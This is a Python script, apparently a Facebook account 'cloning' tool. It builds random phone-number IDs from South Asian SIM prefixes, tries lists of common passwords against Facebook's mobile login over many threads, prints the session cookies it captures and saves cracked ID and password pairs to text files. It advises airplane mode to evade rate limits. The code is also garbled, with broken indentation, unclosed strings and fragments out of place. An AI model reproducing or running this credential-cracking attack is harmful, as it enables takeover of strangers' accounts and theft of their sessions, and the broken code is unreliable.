# WRITTEN BY TAYAB.KHAN
# FOLLOW MY GITHUB : https://github.com/TAYAB-KHAN
from os import system as c
logo='''
'`7MMM.     ,MMF'      db      `7MMF'      `7MMF'`7MMF' `YMM' 
  MMMb    dPMM       ;MM:       MM          MM    MM   .M'   
  M YM   ,M MM      ,V^MM.      MM          MM    MM .d"     
  M  Mb  M' MM     ,M  `MM      MM          MM    MMMMM.     
  M  YM.P'  MM     AbmmmqMA     MM      ,   MM    MM  VMA    
  M  `YM'   MM    A'     VML    MM     ,M   MM    MM   `MM.  
.JML. `'  .JMML..AMA.   .AMMA..JMMmmmmMMM .JMML..JMML.   MMb.''''''BRAND')
                                                           
def clear(): 
     c('clear')
       print(logo)
       print(40*' .')
       print('GITHUB :  TAYAB-KHAN')
       print(40*' .')
def main():
    clear()
       print(' [01] File Cloning
       print(' [02] Random cloning
       print(' [03] gmail Cloning
       print(' [04] Fallow My Fb
       print(' [0] Back menu
   options=input(' [?] CHOICE MENU : ')
   if opt =='1':
		random_crack()
	if opt =='2':
		os.system("xdghttps://www.facebook.com/profile.php?id=100000393670554")
		menu()
		def random_crack():
	os.system('clear')
	print(logo)
	print('[1]\033[1;32m INDIA RANDOM CLONE')
	print('[2]\033[1;36m PAK RANDOM CLONE')
	print('[3]\033[1;33m BANGAL RANDOM CLONE')
	print('[4]\033[1;33m AFGHAN RANDON CLONE')
	print(47*'-')
	opt = input('[?] Choose : ')
	if opt =='1':
		random_number()
	elif opt =='2':
		random_pak_number()
	elif opt =='0':
		menu()
		else:
		print('\033[1;91mChoose valid option\033[0;97m')

def random_number():
	user=[]
	os.system('clear')
	print(logo)
	print("\033[1;32m INDIA code : 9670,9919,9918,8795,9725,9915")
	print(47*'-')
	kode = input('[?] Choose sim Code : ')
	print(47*'-')
	os.system('clear')
	print(logo)
	print(' EXAMPLE CLONE : 2000  3000 4000 5000')
	print('=========================================')
	limit = int(input('[?]\033[1;35m LIMIT CLONE : '))
	for nmbr in range(limit):
		nmp = ''.join(random.choice(string.digits) for _ in range(6))
		user.append(nmp)
	with ThreadPool(max_workers=30) as yaari:
		os.system('clear')
		print(logo)
		tl = str(len(user))
		print(47*'-')
		print('[+] TOTAL NUMBER OF IDS  : \033[1;92m'+tl)
		print('[?] \033[1;35mCHOOSE SIM CODE : \033[1;32m'+kode)
		print('\033[1;37;1m[•] CHOOSE YOUR COUNTRY :(\033[1;96mINDIA\033[1;97m)');print(47*"-");print('    USE FLIGHT (\033[1;91mAIRPLANE\033[1;97m) MODE BEFORE USE');print(47*"-")
		for guru in user:
			uid = kode+guru
			mk = uid[:6]
			pwx = [guru]
			pwx = [kode+guru,mk,'59039200','57573200','57575751','57575752','free fire','Free Fire','i love you','freefire123']
			yaari.submit(rcrack,uid,pwx,tl)
	print(47*"-")
	print('[✓] Crack process has been completed')
	print('[•] Ids saved in MALIK😈ok.txt,MALIK😈cp.txt')
	print(47*"-")
	print(' Press Enter To Back Menu')
	menu()


	#print(iid+'|'+pws+'|'+str(log_cookies))
			if 'c_user' in log_cookies:
				coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
				cid = coki[7:22]
				print('\033[1;92m[MALIK😈-OK] '+uid+' | '+ps+'\033[0;97m')
				print(f"\033[1;33mCOOKIE : \033[1;37m{coki}")
				open('MALIK😈-ok.txt', 'a').write(uid+' | '+ps+'\n')
				oks.append(cid)
				break
			elif 'checkpoint' in log_cookies:
				coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
				uid = coki[151:166]
				print('\n\033[1;91m[MALIK😈-CP] '+uid+' | '+ps+'\033[0;97m')
				#print(f"\n\033[1;33mCOOKIE : \033[1;37m{coki}")
				open('cp.txt', 'a').write(cid+' | '+ps+'\n')
				cps.append(cid)
				break
			else:
				continue
		loop+=1
		sys.stdout.write(f'\r\033[m[MALIK😈] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
		sys.stdout.flush()
	except:
		pass

def random():
	user=[]
	os.system('clear')
	print(logo)
	print('[+] PK code  : 92303,92306,92309,92305,92307')
	print('[+] IND code : 91930,91902****6353,9871,9725')
	print('[+] AFG code : 9377,9378,9379')
	print('[+] BD code : 016,017,018,019')
	print(47*'-')
	kode = input('[?] Choice Code : ')
	os.system('clear')
	print(logo)
	print(' EXAMPLE CLONE : 2000  3000 4000 5000')
	print('=========================================')
	limit = int(input('[?] CLONE LIMIT : '))
	for nmbr in range(limit):
		nmp = ''.join(random.choice(string.digits) for _ in range(7))
		user.append(nmp)
	with ThreadPool(max_workers=30) as yaari:
		os.system('clear')
		print(logo)
		tl = str(len(user))
		print(47*'-')
		print('[+] YOUR TOTAL IDS : \033[1;92m'+tl)
		print('[?] \033[1;35mCHOICE SIM CODE : \033[1;32m'+kode)
		print('\033[1;37;1m[•] YOUR CONTORY (\033[1;92mPakistan\033[1;97m)');print(47*"-");print('    USE FLIGHT (\033[1;91mAIRPLANE\033[1;97m) MODE BEFORE USE');print(47*"-")
		for guru in user:
			uid = kode+guru
			pwx = [guru,'57573200','59039200','57575751','57575752','khankhan123','pakistan','khan12345','alikhan12345','aliali','janjan','ali1122','khann1122','786786','khan123','khan786']
			yaari.submit(rcrack,uid,pwx,tl)
	print(47*"-")
	print('[✓] Crack process has been completed')
	print('[?] Ids saved in MANOok.txt,MALIK😈cp.txt')
	print(47*"-")
	print(' Press Inter To Back Menu')
	menu()
	lo = session.post('https://x.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8',data=log_data,headers=header_freefb).text
			log_cookies=session.cookies.get_dict().keys()
			#print(iid+'|'+pws+'|'+str(log_cookies))
			if 'c_user' in log_cookies:
				coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
				uid = coki[151:166]
				
				print('\033[1;92m[MALIK😈-CP] '+uid+' | '+ps+'\033[0;97m')
				
				print(f"\033[1;33m[COOKIES ]:\033[1;32m{coki}")
				
				open('ok.txt', 'a').write(cid+' | '+ps+'\n')
				
				oks.append(cid)
				break
			elif 'checkpoint' in log_cookies:
				coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
				uid = coki[151:166]
				print('\033[1;91m[MALIK😈-CP] '+uid+' | '+ps+'\033[0;97m')
				#print(f"\n\033[1;33mCOOKIE : \033[1;37m{coki}")
				open('cp.txt', 'a').write(cid+' | '+ps+'\n')
				cps.append(cid)
				break
			else:
				continue
		loop+=1
		sys.stdout.write('\r\33[1;32m[MALIK😈-OK] %s|OK:%s CP:%s \r'%(loop,len(oks),len(cps))),
		sys.stdout.flush()
	except:
		pass
menu()


       
                
